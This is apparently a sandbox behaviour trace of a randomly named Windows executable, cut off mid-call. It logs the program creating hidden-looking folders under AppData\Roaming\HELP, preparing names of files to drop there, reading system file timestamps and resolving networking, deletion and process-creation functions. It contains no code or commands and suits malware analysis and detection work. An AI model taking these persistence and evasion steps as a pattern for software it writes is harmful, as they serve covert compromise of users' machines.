\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86ÀÄõtø*", lpUsedDefaultChar=0x0) returned 256 [0031.724] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.724] GetLastError () returned 0x0 [0031.725] SetLastError (dwErrCode=0x0) [0031.725] GetLastError () returned 0x0 [0031.725] SetLastError (dwErrCode=0x0) [0031.725] GetLastError () returned 0x0 [0031.725] SetLastError (dwErrCode=0x0) [0031.740] GetLastError () returned 0x0 [0031.740] SetLastError (dwErrCode=0x0) [0031.740] GetLastError () returned 0x0 [0031.740] SetLastError (dwErrCode=0x0) [0031.740] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.741] GetLastError () returned 0x0 [0031.741] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.742] SetLastError (dwErrCode=0x0) [0031.742] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.743] GetLastError () returned 0x0 [0031.743] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.750] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.750] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.750] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.750] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.750] SetLastError (dwErrCode=0x0) [0031.750] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.751] GetLastError () returned 0x0 [0031.751] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.752] SetLastError (dwErrCode=0x0) [0031.752] GetLastError () returned 0x0 [0031.753] SetLastError (dwErrCode=0x0) [0031.753] GetLastError () returned 0x0 [0031.753] SetLastError (dwErrCode=0x0) [0031.753] GetLastError () returned 0x0 [0031.753] SetLastError (dwErrCode=0x0) [0031.753] GetLastError () returned 0x0 [0031.753] SetLastError (dwErrCode=0x0) [0031.753] GetLastError () returned 0x0 [0031.753] SetLastError (dwErrCode=0x0) [0031.754] GetLastError () returned 0x0 [0031.754] SetLastError (dwErrCode=0x0) [0031.754] GetLastError () returned 0x0 [0031.754] SetLastError (dwErrCode=0x0) [0031.754] GetLastError () returned 0x0 [0031.754] SetLastError (dwErrCode=0x0) [0031.754] GetLastError () returned 0x0 [0031.755] SetLastError (dwErrCode=0x0) [0031.755] GetLastError () returned 0x0 [0031.759] SetLastError (dwErrCode=0x0) [0031.759] GetLastError () returned 0x0 [0031.759] SetLastError (dwErrCode=0x0) [0031.759] GetLastError () returned 0x0 [0031.759] SetLastError (dwErrCode=0x0) [0031.759] GetLastError () returned 0x0 [0031.759] SetLastError (dwErrCode=0x0) [0031.759] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.760] GetLastError () returned 0x0 [0031.760] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.761] SetLastError (dwErrCode=0x0) [0031.761] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.762] SetLastError (dwErrCode=0x0) [0031.762] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.763] SetLastError (dwErrCode=0x0) [0031.763] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.764] GetLastError () returned 0x0 [0031.764] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.765] SetLastError (dwErrCode=0x0) [0031.765] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.766] SetLastError (dwErrCode=0x0) [0031.766] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.767] GetLastError () returned 0x0 [0031.767] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.768] SetLastError (dwErrCode=0x0) [0031.768] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.769] SetLastError (dwErrCode=0x0) [0031.769] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.770] SetLastError (dwErrCode=0x0) [0031.770] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.771] SetLastError (dwErrCode=0x0) [0031.771] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.772] GetLastError () returned 0x0 [0031.772] SetLastError (dwErrCode=0x0) [0031.773] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.773] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.773] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.775] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af8b8 | out: lpSystemTimeAsFileTime=0x2af8b8*(dwLowDateTime=0xe0a87d70, dwHighDateTime=0x1d3dfba)) [0031.775] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.775] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2af6d8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.775] GetLastError () returned 0x0 [0031.776] GetLastError () returned 0x0 [0031.776] GetLastError () returned 0x0 [0031.776] GetLastError () returned 0x0 [0031.776] GetLastError () returned 0x0 [0031.776] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.776] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.776] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.776] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.776] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.776] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.777] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.777] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.777] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.777] GetLastError () returned 0xb7 [0031.777] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.777] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.777] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.777] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.777] wsprintfA (in: param_1=0x2af558, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.777] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.777] wsprintfA (in: param_1=0x2af454, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.777] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.777] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.778] CloseHandle (hObject=0x74) returned 1 [0031.778] GetLastError () returned 0x0 [0031.778] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.778] GetLastError () returned 0x0 [0031.778] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.778] GetSystemDirectoryA (in: lpBuffer=0x2af558, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.778] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.778] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.778] CloseHandle (hObject=0x74) returned 1 [0031.778] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.778] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.778] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.780] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.780] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.780] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.780] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.781] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.781] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.781] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.781] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.782] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.783] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.783] GetProcAddress 